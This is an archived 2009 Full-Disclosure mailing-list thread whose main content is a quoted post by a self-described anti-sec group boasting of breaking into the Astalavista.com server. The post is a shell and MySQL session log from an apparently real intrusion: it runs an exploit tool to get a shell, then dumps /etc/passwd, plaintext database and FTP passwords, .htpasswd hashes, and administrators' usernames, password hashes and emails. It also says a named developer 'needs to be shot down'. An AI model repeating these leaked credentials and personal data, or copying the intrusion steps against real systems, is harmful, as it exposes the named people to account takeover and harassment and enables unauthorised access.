lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-ID: <282134E75BDEB64E943CAF38C80BDD8AD3262F@PRO-EXCHANGESRV.experian.dk>
Date: Mon, 8 Jun 2009 15:39:12 +0200
From: "Anders Klixbull" <akl@...erian.dk>
To: "Charles Majola" <charles.lists@...il.com>,
	<srshaxsir@...hmail.com>
Cc: full-disclosure@...ts.grok.org.uk
Subject: Re: Astalavista.com Exposed

OH MY GOD I DONT KNOW BUT DO WE REALLY CARE????
their site was always a crappy piece of shit

________________________________

From: full-disclosure-bounces@...ts.grok.org.uk [mailto:full-disclosure-bounces@...ts.grok.org.uk] On Behalf Of Charles Majola
Sent: 8. juni 2009 14:40
To: srshaxsir@...hmail.com
Cc: full-disclosure@...ts.grok.org.uk
Subject: Re: [Full-disclosure] Astalavista.com Exposed


Good lord man, have they fixed this yet?  

On Fri, Jun 5, 2009 at 3:58 AM, <srshaxsir@...hmail.com> wrote:


	Astalavista.com
	Astalavista.net
	                                 The Hacking & Security Community
	 [+] Founded in 1997 by a hacker computer enthusiast
	 [-] Exposed in 2009 by anti-sec group
	
	>From <http://astalavista.com/faq>:
	>> 03. Who's behind the site?
	>>
	>> A team of security and IT professionals, and a countless number
	of contributors from all over the world.
	
	>> 05. Is it true that the site is visited by script-kiddies and
	warez fans only?
	>>
	>> Absolutely not! The audience behind the site consists of home
	users, worldwide companies and corporations, educational and non-
	profit organizations, government and military institutions.
	>> All of these have been visiting the site on a daily basis for
	the past couple of years, contributing in various ways, or
	requesting services and information.
	
	Why has Astalavista been targeted?
	
	Other than the fact that they are not doing any of this for the
	"community" but
	for the money, they spread exploits for kids, claim to be a
	security community
	(with no real sense of security on their own servers), and they
	charge you $6.66
	per months to access a dead forum with a directory filled with
	public releases
	and outdated / broken services.
	
	We wanted to see how good that "team of security and IT
	professionals" really is.
	
	Let's begin.
	
	anti-sec:~# ./g0tshell astalavista.com -p 80
	       [+] Connecting to astalavista.com:80
	       [+] Grabbing banner...
	               LiteSpeed
	       [+] Injecting shellcode...
	       [-] Wait for it
	
	       [~] We g0tshell
	               uname -a: Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5
	#1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
	               ID: uid=100(apache) gid=500(apache) groups=500(apache)
	
	sh-3.2$ cat /etc/passwd
	root:x:0:0:root:/root:/bin/bash
	bin:x:1:1:bin:/bin:/sbin/nologin
	daemon:x:2:2:daemon:/sbin:/sbin/nologin
	adm:x:3:4:adm:/var/adm:/sbin/nologin
	lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
	sync:x:5:0:sync:/sbin:/bin/sync
	shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
	halt:x:7:0:halt:/sbin:/sbin/halt
	mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
	news:x:9:13:news:/etc/news:
	uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
	operator:x:11:0:operator:/root:/sbin/nologin
	games:x:12:100:games:/usr/games:/sbin/nologin
	gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
	ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
	nobody:x:99:99:Nobody:/:/sbin/nologin
	rpm:x:37:37::/var/lib/rpm:/sbin/nologin
	dbus:x:81:81:System message bus:/:/sbin/nologin
	nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
	mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
	smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
	vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
	haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
	rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
	rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
	nfsnobody:x:4294967294:4294967294:Anonymous NFS
	User:/var/lib/nfs:/sbin/nologin
	sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
	pcap:x:77:77::/var/arpwatch:/sbin/nologin
	named:x:25:25:Named:/var/named:/sbin/nologin
	apache:x:100:500::/var/www:/bin/false
	diradmin:x:101:101::/usr/local/directadmin:/bin/bash
	mysql:x:102:102:MySQL server:/var/lib/mysql:/bin/bash
	webapps:x:500:501::/var/www/html:/bin/bash
	majordomo:x:103:2::/etc/virtual/majordomo:/bin/bash
	admin:x:501:502::/home/admin:/bin/bash
	jon:x:502:503::/home/jon:/bin/bash
	com:x:503:504::/home/com:/bin/bash
	ntp:x:38:38::/etc/ntp:/sbin/nologin
	ais:x:39:39:openais Standards Based Cluster
	Framework:/:/sbin/nologin
	astanet:x:504:505::/home/astanet:/bin/bash
	avahi:x:70:70:Avahi daemon:/:/sbin/nologin
	avahi-autoipd:x:104:103:avahi-autoipd:/var/lib/avahi-
	autoipd:/sbin/nologin
	
	sh-3.2$ cat /etc/hosts
	# Do not remove the following line, or various programs
	# that require network functionality will fail.
	127.0.0.1       localhost.localdomain   localhost
	::1     localhost6.localdomain6 localhost6
	80.74.154.172           asta1.astalavistaserver.com
	
	sh-3.2$ pwd
	/home/com/public_html
	
	sh-3.2$ ls -la
	total 18460
	drwxr-xr-x 30 com apache     4096 May 28 17:06 .
	drwx--x--x 11 com com        4096 Jun 25  2008 ..
	drwxr-xr-x  2 com com        4096 Feb  2 19:29 admin
	drwxrwxrwx  2 com com    18591744 Jun  4 08:04 cache
	drwxr-xr-x  6 com com        4096 Mar 28 21:17 cadmin
	drwxrwxrwx  2 com com        4096 May 19 00:50 config
	drwxr-xr-x  2 com com        4096 Mar 20 11:05 core
	drwxr-xr-x 18 com com        4096 Feb  2 19:29 core_modules
	drwxr-xr-x  4 com com        4096 Feb  2 19:29 customizing
	drwxr-xr-x  2 com com        4096 May 11 13:24 customizing_paulo
	drwxr-xr-x  6 com com        4096 Mar 30 12:28 __DELETE__
	-rw-r--r--  1 com com        8035 May 19 14:26
	directory_to_mediadir.php
	drwxr-xr-x  2 com com        4096 Sep  9  2008 dvd
	drwxr-xr-x  3 com com        4096 Feb  2 19:29 editor
	-rw-r--r--  1 com com        3750 Feb 27 16:12 favicon.ico
	drwxrwxrwx  2 com com        4096 Jun  4 08:00 feed
	-rwxrwxrwx  1 com com       10736 May 29 12:44 .htaccess
	-rw-r--r--  1 com com        7638 Apr 21 08:45 .htaccess.2009-04-
	21.bak
	-rw-r--r--  1 com com       10768 May 11 11:53 .htaccess.2009-05-
	11.bak
	drwxr-xr-x 18 com com        4096 Apr  9  2008 ideapool
	drwxrwxrwx 14 com com        4096 Feb  2 19:29 images
	-rw-r--r--  1 com com       97496 Jun  2 13:01 index.php
	drwxr-xr-x  6 com com        4096 Feb  2 19:29 installer
	drwxr-xr-x  8 com com        4096 Feb  2 19:29 lang
	drwxr-xr-x 22 com com        4096 Feb  2 19:29 lib
	drwxrwxrwx 12 com com        4096 Jun  2 07:47 media
	drwxr-xr-x  8 com com        4096 May 11 12:48 modifications
	drwxr-xr-x 34 com com        4096 May 28 16:30 modules
	drwxr-xr-x 11 com com        4096 Jan 30 15:00 _myAdmin
	drwxrwxr-x 22 com com        4096 May 28 17:06 _new
	drwxr-xr-x 26 com com        4096 Feb  2 19:27 _old
	drwxr-xr-x  2 com com        4096 Mar 30 12:29 phproxy
	drwxr-xr-x  2 com com        4096 Mar 30 12:30 proxy
	-rw-r--r--  1 com com          26 Feb  2 19:33 robots.txt
	-rwxrwxrwx  1 com com       10844 Jun  2 09:50 sitemap.xml
	-rw-r--r--  1 com com         223 Mar 30 15:32 test.php
	drwxrwxrwx  8 com com        4096 Mar  6 13:15 themes
	drwxrwxrwx  3 com com        4096 Jun  4 08:00 tmp
	drwxr-xr-x  3 com com        4096 Feb  2 19:33 webcam
	
	sh-3.2$ head -20 index.php
	<?php
	
	/**
	 * The main page for the CMS
	 * @copyright   CONTREXX CMS - COMVATION AG
	 * @author      Comvation Development Team
	 * @version     v1.0.9.10.1 stable
	 * @package        contrexx
	 * @subpackage    core
	 * @link        http://www.contrexx.com/ contrexx homepage
	 * @since       v0.0.0.0
	 * @todo        Capitalize all class names in project
	 * @uses        /config/configuration.php
	 * @uses        /config/settings.php
	 * @uses        /config/version.php
	 * @uses        /core/API.php
	 * @uses        /core_modules/cache/index.class.php
	 * @uses        /core/error.class.php
	 * @uses        /core_modules/banner/index.class.php
	 * @uses        /core_modules/contact/index.class.php
	
	sh-3.2$ cd config/
	sh-3.2$ ls -la
	total 32
	drwxrwxrwx  2 com com    4096 May 19 00:50 .
	drwxr-xr-x 30 com apache 4096 May 28 17:06 ..
	-rwxrwxrwx  1 com com    2998 May 11 12:29 configuration.php
	-rwxrwxrwx  1 com com    7610 May 28 17:27 set_constants.php
	-rwxrwxrwx  1 com com    4186 May 25 12:54 settings.php
	-rwxrwxrwx  1 com com     672 Feb  2 19:29 version.php
	
	sh-3.2$ cat configuration.php
	[snip]
	$_DBCONFIG['host'] = 'localhost'; // This is normally set to
	localhost
	$_DBCONFIG['database'] = 'com_contrexx2_live'; // Database name
	$_DBCONFIG['tablePrefix'] = 'contrexx_'; // Database table prefix
	$_DBCONFIG['user'] = 'contrexxuser2'; // Database username
	$_DBCONFIG['password'] = '0fEYNZgXz1pKe'; // Database password
	$_DBCONFIG['dbType'] = 'mysql'; // Database type (e.g.
	mysql,postgres ..)
	$_DBCONFIG['charset'] = 'utf8'; // Charset (default, latin1, utf8,
	..)
	[snip]
	$_FTPCONFIG['is_activated'] = true; // Ftp support true or false
	$_FTPCONFIG['use_passive'] = true;      // Use passive ftp mode
	$_FTPCONFIG['host']     = 'localhost';// This is normally set to
	localhost
	$_FTPCONFIG['port'] = 21; // Ftp remote port
	$_FTPCONFIG['username'] = 'dev@...alavista.com'; // Ftp login
	username
	$_FTPCONFIG['password'] = 'jajklop0Iuj'; // Ftp login password
	$_FTPCONFIG['path']     = '/'; // Ftp path to cms
	
	sh-3.2$ cd ..
	sh-3.2$ cd dvd/
	sh-3.2$ ls -la
	total 2913780
	drwxr-xr-x  2 com com          4096 Sep  9  2008 .
	drwxr-xr-x 30 com apache       4096 May 28 17:06 ..
	-rw-r--r--  1 com com    1050061483 May 16  2008
	astalavista_security_toolbox_dvd_2008.part1.rar
	-rw-r--r--  1 com com    1050061483 May 16  2008
	astalavista_security_toolbox_dvd_2008.part2.rar
	-rw-r--r--  1 com com     880644069 May 16  2008
	astalavista_security_toolbox_dvd_2008.part3.rar
	-rw-r--r--  1 com com           115 Jan 29  2008 .htaccess
	
	sh-3.2$ cat .htaccess
	authType Basic
	authName DVD
	authUserFile /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd
	require valid-user
	
	sh-3.2$ cat /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd
	DVDdownload:CRD8cuY6.MPT6
	DVDdownload2:CR8a36.wluFMg
	
	sh-3.2$ cat test.php
	<?php
	$url =
	'aHR0cDovL2kubnVzZWVrLmNvbS9pbWFnZXMvdGVtcGxhdGUvMzYweDMxOC9pc3QyXzc
	0Njc4MV9mZW1hbGVfc3R1ZGVudC5qcGc%3D';
	$url = str_replace(array('&amp;', '&#38;'), '&',
	base64_decode(rawurldecode($url)));
	echo $url;
	?>
	
	sh-3.2$ cd modifications/
	sh-3.2$ ls -la
	total 32
	drwxr-xr-x  8 com com    4096 May 11 12:48 .
	drwxr-xr-x 30 com apache 4096 May 28 17:06 ..
	drwxr-xr-x  3 com com    4096 Feb  2 19:33 com_avtng
	drwxr-xr-x  3 com com    4096 May 12 09:26 cronjobs
	drwxr-xr-x  2 com com    4096 Mar  2 10:35 onlinetools
	drwxr-xr-x  4 com com    4096 Feb  2 19:33 pjirc
	drwxr-xr-x  2 com com    4096 Feb  2 19:33 search
	drwxr-xr-x  2 com com    4096 Mar 25 08:56 _tmp
	
	sh-3.2$ ls -R
	.:
	com_avtng  cronjobs  onlinetools  pjirc  search  _tmp
	
	./com_avtng:
	avtng.php  banner_bottom.inc.php  banner_button.inc.php
	banner_content.inc.php  banner_popunder.inc.php
	banner_right.inc.php  banner_top.inc.php  iframe.php  scripts
	
	./com_avtng/scripts:
	popunder.js
	
	./cronjobs:
	exploits.php  exploits.sh  google_blogindexing.php  ip2country.sh
	proxydb2.php  proxydb.php  securitynews.php  tmp
	
	./cronjobs/tmp:
	contrexx_module_onlinetools_defaultports.csv
	contrexx_module_onlinetools_geolitecity_country.csv
	
	./onlinetools:
	index.php
	
	./pjirc:
	a_big.jpg          english.lng       img              irc.jar
	   NormalApplet.html  pixx-french.lng  pjirc.cfg       securedirc-
	unsigned.cab  thanks.txt
	AppletWithJS.html  french.lng        IRCApplet.class  irc-
	unsigned.jar  pixx.cab           pixx.jar         readme.txt
	SimpleApplet.html        versions.txt
	background.gif     HeavyApplet.html  irc.cab          license.txt
	   pixx-english.lng   pixx-readme.txt  securedirc.cab  snd
	
	./pjirc/img:
	ange.gif    bombe.gif   clin-oeuil.gif         content.gif
	enerve2.gif  garcon.gif     langue.gif  mecontent.gif  ordi.gif
	 portable.gif   sapin.gif    triste.gif
	arbre.gif   bouche.gif  clin-oeuil-langue.gif  cool.gif
	femme.gif    grognon.gif    lettre.gif  newbie.gif     pere-
	noel.gif  pouce-non.gif  sleep.gif    verre-eau.gif
	argh.gif    bouqin.gif  coeur-brise.gif        diable.gif
	fille.gif    halloween.gif  lit.gif     OH-1.gif       pleure.gif
	 pouce-oui.gif  soleil.gif   verre-vin.gif
	ballon.gif  cadeau.gif  coeur.gif              dwchat.gif
	fleur.gif    hamburger.gif  love.gif    OH-2.gif       poisson.gif
	 roll-eyes.gif  sourire.gif  yinyang.gif
	biere.gif   chien.gif   comprends-pas.gif      enerve1.gif
	fume.gif     homme.gif      lune.gif    OH-3.gif       pomme.gif
	 rouge.gif      terre.gif
	
	./pjirc/snd:
	bell2.au  ding.au
	
	./search:
	searchEngines.php  search.php
	
	./_tmp:
	defaultPorts.php  defaultPorts.txt
	
	sh-3.2$ cd cronjobs/
	sh-3.2$ cat exploits.php
	[snip]
	$categories   = array();
	$milw0rmFile  = FULLPATH .
	'/modifications/cronjobs/tmp/milw0rm/sploitlist.txt';
	$expolits     = file($milw0rmFile);
	$comExploits  = array();
	[snip]
	// manage data
	for ($x = 0; $x < count($expolits); $x++){ // count($expolits) -
	2640
	
	   // get path and title
	   $expolits[$x] = trim($expolits[$x]);
	   $path         = str_replace('./', FULLPATH .
	'/modifications/cronjobs/tmp/milw0rm/', substr($expolits[$x], 0,
	strpos($expolits[$x], ' ')));
	   $title        = htmlspecialchars(substr($expolits[$x],
	strpos($expolits[$x], ' ') + 1, strlen($expolits[$x])), ENT_QUOTES);
	
	   // check if file exists
	   if (file_exists($path)) {
	
	       $text = file_get_contents($path);
	
	       // get content and date
	       //$text = htmlspecialchars($text, ENT_QUOTES);
	       $tmptext = addslashes(htmlentities($text,  ENT_QUOTES, "UTF-
	8"));
	       if ($tmptext != '') {
	           $text = $tmptext;
	       } else {
	           $text = addslashes(htmlentities($text,  ENT_QUOTES));
	       }
	       $date = str_replace('milw0rm.com [', '', str_replace(']',
	'', strstr($text, 'milw0rm.com [')));
	       $tmp  = explode('-', $date);
	       $date = mktime(0, 0, 0, trim($tmp[1]), trim($tmp[2]),
	trim($tmp[0]));
	       $cat  = getCategory ($path);
	       $ext  = pathinfo(basename($path));
	       $ext  = $ext['extension'];
	       $qStr = "
	           SELECT  `id`
	           FROM    `contrexx_module_exploits`
	           WHERE   `title`  =  '" . $title . "'
	           AND     `date`   =  '" . $date . "'
	       ";
	       echo $x + 1 . ' von ' . count($expolits) . ' -> ' . $qStr .
	"\n";
	       $q = $_objDB->query($qStr);
	
	       if ($q->numRows() == 0) {
	
	           // prepare array
	           $comExploits[$x]['date']      = $date;
	           $comExploits[$x]['title']     = $title;
	           $comExploits[$x]['author']    = 'milw0rm';
	           $comExploits[$x]['text']      = $text;
	           $comExploits[$x]['source']    = $ext;
	           $comExploits[$x]['url1']      = '';
	           $comExploits[$x]['url2']      = '';
	           $comExploits[$x]['catid']     = $cat;
	           $comExploits[$x]['lang']      = '2';
	           $comExploits[$x]['userid']    = '12';
	           $comExploits[$x]['startdate'] = '0000-00-00';
	           $comExploits[$x]['enddate']   = '0000-00-00';
	           $comExploits[$x]['status']    = '1';
	           $comExploits[$x]['changelog'] = $date;
	
	       }
	[snip]
	   $xml = '<?xml version="1.0" encoding="UTF-8"?>
	<rss version="2.0">
	   <channel>
	       <title>ASTALAVISTA.com - Exploits</title>
	       <link>http://www.astalavista.com/exploits</link>
	       <description>All availably Exploits.</description>
	       <language>en-us</language>
	       <lastBuildDate>' . date('F, j M Y H:i:s O') .
	'</lastBuildDate>
	       <docs>http://blogs.law.harvard.edu/tech/rss</docs>
	       <generator>Astalavista.com</generator>
	       <webMaster>info@...alavista.com</webMaster>' . $items . '
	   </channel>
	</rss>';
	
	
	   if (file_exists(FULLPATH . '/feed/exploits.xml')) {
	       unlink (FULLPATH . '/feed/exploits.xml');
	   }
	
	
	   file_put_contents(FULLPATH . '/feed/exploits.xml', $xml);
	[snip]
	
	sh-3.2$ cat exploits.sh
	#!/bin/sh
	
	###########################################################
	#                                                         #
	#   Title:        milw0rm exploits adder                  #
	#   Description:  Add all milw0rm exploits to the         #
	#                 Astalavista.com database                #
	#                                                         #
	#   Company:      Astalavista Group                       #
	#   Author:       Paulo M. Santos                         #
	#   E-Mail:       paulo.santos@...alavista.ch             #
	#                                                         #
	###########################################################
	
	
	# path
	this_path=/home/com/public_html/modifications/cronjobs
	
	# change directory
	cd $this_path
	cd tmp/
	
	# delete files
	rm -rf milw0rm.tar.* &
	rm -rf milw0rm/ &
	
	# wget milw0rm paket
	wget http://www.milw0rm.com/sploits/milw0rm.tar.bz2
	
	# extract milw0rm paket
	tar -xvf milw0rm.tar.bz2
	
	# change owner
	chown -R com .
	chgrp -R com .
	
	# execute php script
	cd $this_path
	php -q exploits.php
	
	# delete files
	rm -rf tmp/milw0rm.tar.*
	rm -rf tmp/milw0rm/
	
	sh-3.2$ echo "Paulo M. Santos needs to be shot down."
	Paulo M. Santos needs to be shot down.
	
	mysql -u contrexxuser2 -p
	Enter password:
	Welcome to the MySQL monitor.  Commands end with ; or \g.
	Your MySQL connection id is 261694
	Server version: 5.0.45-community-log MySQL Community Edition (GPL)
	
	Type 'help;' or '\h' for help. Type '\c' to clear the buffer.
	
	mysql> show databases;
	+--------------------+
	| Database           |
	+--------------------+
	| information_schema |
	| com_contrexx2      |
	| com_contrexx2_live |
	| test               |
	+--------------------+
	4 rows in set (0.00 sec)
	
	mysql> use com_contrexx2_live
	Database changed
	mysql> show tables;
	+--------------------------------------------------+
	| Tables_in_com_contrexx2_live                     |
	+--------------------------------------------------+
	| cc_banner_counter                                |
	| cc_search_counter                                |
	| contrexx_access_group_dynamic_ids                |
	| contrexx_access_group_static_ids                 |
	| contrexx_access_rel_user_group                   |
	| contrexx_access_settings                         |
	| contrexx_access_user_attribute                   |
	| contrexx_access_user_attribute_name              |
	| contrexx_access_user_attribute_value             |
	| contrexx_access_user_core_attribute              |
	| contrexx_access_user_groups                      |
	| contrexx_access_user_mail                        |
	| contrexx_access_user_profile                     |
	| contrexx_access_user_title                       |
	| contrexx_access_user_validity                    |
	| contrexx_access_users                            |
	| contrexx_backend_areas                           |
	| contrexx_backups                                 |
	| contrexx_content                                 |
	| contrexx_content_history                         |
	| contrexx_content_logfile                         |
	| contrexx_content_navigation                      |
	| contrexx_content_navigation_history              |
	| contrexx_ids                                     |
	| contrexx_languages                               |
	| contrexx_lib_country                             |
	| contrexx_log                                     |
	| contrexx_module_alias_source                     |
	| contrexx_module_alias_target                     |
	| contrexx_module_block_blocks                     |
	| contrexx_module_block_rel_lang                   |
	| contrexx_module_block_rel_pages                  |
	| contrexx_module_block_settings                   |
	| contrexx_module_blog_categories                  |
	| contrexx_module_blog_comments                    |
	| contrexx_module_blog_message_to_category         |
	| contrexx_module_blog_messages                    |
	| contrexx_module_blog_messages_lang               |
	| contrexx_module_blog_networks                    |
	| contrexx_module_blog_networks_lang               |
	| contrexx_module_blog_settings                    |
	| contrexx_module_blog_votes                       |
	| contrexx_module_calendar                         |
	| contrexx_module_calendar_access                  |
	| contrexx_module_calendar_categories              |
	| contrexx_module_calendar_form_data               |
	| contrexx_module_calendar_form_fields             |
	| contrexx_module_calendar_registrations           |
	| contrexx_module_calendar_settings                |
	| contrexx_module_calendar_style                   |
	| contrexx_module_contact_form                     |
	| contrexx_module_contact_form_data                |
	| contrexx_module_contact_form_field               |
	| contrexx_module_contact_settings                 |
	| contrexx_module_data_categories                  |
	| contrexx_module_data_message_to_category         |
	| contrexx_module_data_messages                    |
	| contrexx_module_data_messages_lang               |
	| contrexx_module_data_placeholders                |
	| contrexx_module_data_settings                    |
	| contrexx_module_directory_access                 |
	| contrexx_module_directory_categories             |
	| contrexx_module_directory_dir                    |
	| contrexx_module_directory_inputfields            |
	| contrexx_module_directory_levels                 |
	| contrexx_module_directory_mail                   |
	| contrexx_module_directory_rel_dir_cat            |
	| contrexx_module_directory_rel_dir_level          |
	| contrexx_module_directory_settings               |
	| contrexx_module_directory_settings_google        |
	| contrexx_module_directory_vote                   |
	| contrexx_module_docsys                           |
	| contrexx_module_docsys_categories                |
	| contrexx_module_egov_configuration               |
	| contrexx_module_egov_orders                      |
	| contrexx_module_egov_product_calendar            |
	| contrexx_module_egov_product_fields              |
	| contrexx_module_egov_products                    |
	| contrexx_module_egov_settings                    |
	| contrexx_module_exploits                         |
	| contrexx_module_exploits_categories              |
	| contrexx_module_feed_category                    |
	| contrexx_module_feed_news                        |
	| contrexx_module_feed_newsml_association          |
	| contrexx_module_feed_newsml_categories           |
	| contrexx_module_feed_newsml_documents            |
	| contrexx_module_feed_newsml_providers            |
	| contrexx_module_forum_access                     |
	| contrexx_module_forum_categories                 |
	| contrexx_module_forum_categories_lang            |
	| contrexx_module_forum_notification               |
	| contrexx_module_forum_postings                   |
	| contrexx_module_forum_rating                     |
	| contrexx_module_forum_settings                   |
	| contrexx_module_forum_statistics                 |
	| contrexx_module_gallery_categories               |
	| contrexx_module_gallery_comments                 |
	| contrexx_module_gallery_language                 |
	| contrexx_module_gallery_language_pics            |
	| contrexx_module_gallery_pictures                 |
	| contrexx_module_gallery_settings                 |
	| contrexx_module_gallery_votes                    |
	| contrexx_module_guestbook                        |
	| contrexx_module_guestbook_settings               |
	| contrexx_module_livecam                          |
	| contrexx_module_livecam_settings                 |
	| contrexx_module_market                           |
	| contrexx_module_market_access                    |
	| contrexx_module_market_categories                |
	| contrexx_module_market_mail                      |
	| contrexx_module_market_paypal                    |
	| contrexx_module_market_settings                  |
	| contrexx_module_market_spez_fields               |
	| contrexx_module_mediadir_access                  |
	| contrexx_module_mediadir_categories              |
	| contrexx_module_mediadir_comments                |
	| contrexx_module_mediadir_dir                     |
	| contrexx_module_mediadir_inputfields             |
	| contrexx_module_mediadir_levels                  |
	| contrexx_module_mediadir_mail                    |
	| contrexx_module_mediadir_rel_dir_cat             |
	| contrexx_module_mediadir_rel_dir_level           |
	| contrexx_module_mediadir_reports                 |
	| contrexx_module_mediadir_settings                |
	| contrexx_module_mediadir_settings_google         |
	| contrexx_module_mediadir_vote                    |
	| contrexx_module_memberdir_directories            |
	| contrexx_module_memberdir_name                   |
	| contrexx_module_memberdir_settings               |
	| contrexx_module_memberdir_values                 |
	| contrexx_module_nettools_allowed_groups          |
	| contrexx_module_nettools_settings                |
	| contrexx_module_news                             |
	| contrexx_module_news_access                      |
	| contrexx_module_news_categories                  |
	| contrexx_module_news_settings                    |
	| contrexx_module_news_teaser_frame                |
	| contrexx_module_news_teaser_frame_templates      |
	| contrexx_module_news_ticker                      |
	| contrexx_module_newsletter                       |
	| contrexx_module_newsletter_attachment            |
	| contrexx_module_newsletter_category              |
	| contrexx_module_newsletter_confirm_mail          |
	| contrexx_module_newsletter_rel_cat_news          |
	| contrexx_module_newsletter_rel_user_cat          |
	| contrexx_module_newsletter_settings              |
	| contrexx_module_newsletter_template              |
	| contrexx_module_newsletter_tmp_sending           |
	| contrexx_module_newsletter_user                  |
	| contrexx_module_newsletter_user_title            |
	| contrexx_module_onlinetools_defaultports         |
	| contrexx_module_onlinetools_defaultports_back    |
	| contrexx_module_onlinetools_geolitecity_blocks   |
	| contrexx_module_onlinetools_geolitecity_country  |
	| contrexx_module_onlinetools_geolitecity_location |
	| contrexx_module_podcast_category                 |
	| contrexx_module_podcast_medium                   |
	| contrexx_module_podcast_rel_category_lang        |
	| contrexx_module_podcast_rel_medium_category      |
	| contrexx_module_podcast_settings                 |
	| contrexx_module_podcast_template                 |
	| contrexx_module_proxydb                          |
	| contrexx_module_recommend                        |
	| contrexx_module_repository                       |
	| contrexx_module_securitynews_cats                |
	| contrexx_module_securitynews_feeds               |
	| contrexx_module_securitynews_news                |
	| contrexx_module_shop_categories                  |
	| contrexx_module_shop_config                      |
	| contrexx_module_shop_countries                   |
	| contrexx_module_shop_currencies                  |
	| contrexx_module_shop_customers                   |
	| contrexx_module_shop_importimg                   |
	| contrexx_module_shop_lsv                         |
	| contrexx_module_shop_mail                        |
	| contrexx_module_shop_mail_content                |
	| contrexx_module_shop_manufacturer                |
	| contrexx_module_shop_order_items                 |
	| contrexx_module_shop_order_items_attributes      |
	| contrexx_module_shop_orders                      |
	| contrexx_module_shop_payment                     |
	| contrexx_module_shop_payment_processors          |
	| contrexx_module_shop_pricelists                  |
	| contrexx_module_shop_products                    |
	| contrexx_module_shop_products_attributes         |
	| contrexx_module_shop_products_attributes_name    |
	| contrexx_module_shop_products_attributes_value   |
	| contrexx_module_shop_products_downloads          |
	| contrexx_module_shop_rel_countries               |
	| contrexx_module_shop_rel_payment                 |
	| contrexx_module_shop_rel_shipment                |
	| contrexx_module_shop_shipment_cost               |
	| contrexx_module_shop_shipper                     |
	| contrexx_module_shop_vat                         |
	| contrexx_module_shop_zones                       |
	| contrexx_module_u2u_address_list                 |
	| contrexx_module_u2u_message_log                  |
	| contrexx_module_u2u_sent_messages                |
	| contrexx_module_u2u_settings                     |
	| contrexx_module_u2u_user_log                     |
	| contrexx_modules                                 |
	| contrexx_sessions                                |
	| contrexx_settings                                |
	| contrexx_settings_smtp                           |
	| contrexx_skins                                   |
	| contrexx_stats_browser                           |
	| contrexx_stats_colourdepth                       |
	| contrexx_stats_config                            |
	| contrexx_stats_country                           |
	| contrexx_stats_hostname                          |
	| contrexx_stats_javascript                        |
	| contrexx_stats_operatingsystem                   |
	| contrexx_stats_referer                           |
	| contrexx_stats_requests                          |
	| contrexx_stats_requests_summary                  |
	| contrexx_stats_screenresolution                  |
	| contrexx_stats_search                            |
	| contrexx_stats_spiders                           |
	| contrexx_stats_spiders_summary                   |
	| contrexx_stats_visitors                          |
	| contrexx_stats_visitors_summary                  |
	| contrexx_voting_additionaldata                   |
	| contrexx_voting_email                            |
	| contrexx_voting_rel_email_system                 |
	| contrexx_voting_results                          |
	| contrexx_voting_system                           |
	| foo                                              |
	+--------------------------------------------------+
	227 rows in set (0.01 sec)
	
	mysql> select count(*) as skids from contrexx_access_users;
	+-------+
	| skids |
	+-------+
	| 53699 |
	+-------+
	1 row in set (0.00 sec)
	
	mysql> describe contrexx_access_users;
	+------------------+------------------------------------------+-----
	-+-----+--------------+----------------+
	| Field            | Type                                     |
	Null | Key | Default      | Extra          |
	+------------------+------------------------------------------+-----
	-+-----+--------------+----------------+
	| id               | int(10) unsigned                         | NO
	 | PRI | NULL         | auto_increment |
	| is_admin         | tinyint(1) unsigned                      | NO
	 |     | 0            |                |
	| username         | varchar(40)                              | YES
	 | MUL | NULL         |                |
	| password         | varchar(32)                              | YES
	 |     | NULL         |                |
	| regdate          | int(14) unsigned                         | NO
	 |     | 0            |                |
	| expiration       | int(14) unsigned                         | NO
	 |     | 0            |                |
	| validity         | int(10) unsigned                         | NO
	 |     | 0            |                |
	| last_auth        | int(14) unsigned                         | NO
	 |     | 0            |                |
	| last_activity    | int(14) unsigned                         | NO
	 |     | 0            |                |
	| email            | varchar(255)                             | YES
	 |     | NULL         |                |
	| email_access     | enum('everyone','members_only','nobody') | NO
	 |     | nobody       |                |
	| frontend_lang_id | int(2) unsigned                          | NO
	 |     | 0            |                |
	| backend_lang_id  | int(2) unsigned                          | NO
	 |     | 0            |                |
	| active           | tinyint(1)                               | NO
	 |     | 0            |                |
	| profile_access   | enum('everyone','members_only','nobody') | NO
	 |     | members_only |                |
	| restore_key      | varchar(32)                              | NO
	 |     |              |                |
	| restore_key_time | int(14) unsigned                         | NO
	 |     | 0            |                |
	| u2u_active       | enum('0','1')                            | NO
	 |     | 1            |                |
	+------------------+------------------------------------------+-----
	-+-----+--------------+----------------+
	18 rows in set (0.00 sec)
	
	mysql> select username,password,email from contrexx_access_users
	where is_admin = 1;
	+------------+----------------------------------+-------------------
	----------+
	| username   | password                         | email
	         |
	+------------+----------------------------------+-------------------
	----------+
	| system     | 0defe9e458e745625fffbc215d7801c5 |
	info@...vation.com          |
	| prozac     | 1f65f06d9758599e9ad27cf9707f92b5 |
	prozac@...alavista.com      |
	| Be1er0ph0r | 78d164dc7f57cc142f07b1b4629b958a |
	paulo.santos@...alavista.ch |
	| schmid     | 0defe9e458e745625fffbc215d7801c5 |
	ivan.schmid@...vation.com   |
	+------------+----------------------------------+-------------------
	----------+
